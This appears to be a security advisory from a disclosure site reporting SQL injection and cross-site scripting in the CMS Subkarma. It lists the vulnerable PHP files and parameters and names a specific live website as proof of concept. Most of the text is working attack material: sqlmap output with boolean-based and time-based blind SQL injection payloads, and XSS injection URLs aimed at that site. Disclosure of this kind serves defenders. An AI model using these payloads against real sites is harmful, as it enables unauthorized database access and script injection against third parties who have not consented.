CMS Subkarma Cross Site Scripting / SQL Injection

2014.10.14

Credit: Renzi

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79
CWE-89

# Multiple SQL Injection & XSS on CMS SUBKARMA

# Risk: High

# CWE number: CWE-89,CWE-79

# Date: 13/10/2014

# Vendor: www.jttel.com.tw

# Author: Felipe " Renzi " Gabriel

# Contact: renzi@linuxmail.org

# Tested on:  Linux Mint ; Firefox ; Sqlmap 1.0-dev-nongit-20140906

# Vulnerables File: news.php ; product.php ; pro_con.php

# Exploits: http://www.target.com/news.php?id=[XSS]

            http://www.target.com/product.php?cat_id=[SQLI] & [XSS]
  
            http://www.target.com/pro_con.php?id=[SQLI] & [XSS]

# PoC:      http://www.cideko.com/product.php?cat_id=18  

            http://www.cideko.com/pro_con.php?id=3 

--- "SQLI using SQLMAP."--- 
            
    Place: GET
    Parameter: cat_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat_id=18 AND 6427=6427

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: cat_id=18 AND 7867=BENCHMARK(5000000,MD5(0x4d666b6e))
---

--- " XSS using HTML injection."---

    http://www.cideko.com/news.php?id=38"><marquee>XSS</marquee>

    http://www.cideko.com/product.php?cat_id=18"><marquee>XSS</marquee>
  
    http://www.cideko.com/pro_con.php?id=3"><marquee>XSS</marquee>

# Note

The SQL Injection on file pro_con.php parameter id, was published by Ali Pandidan.
Reference, http://cxsecurity.com/issue/WLB-2011020004 .

# Thank's

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}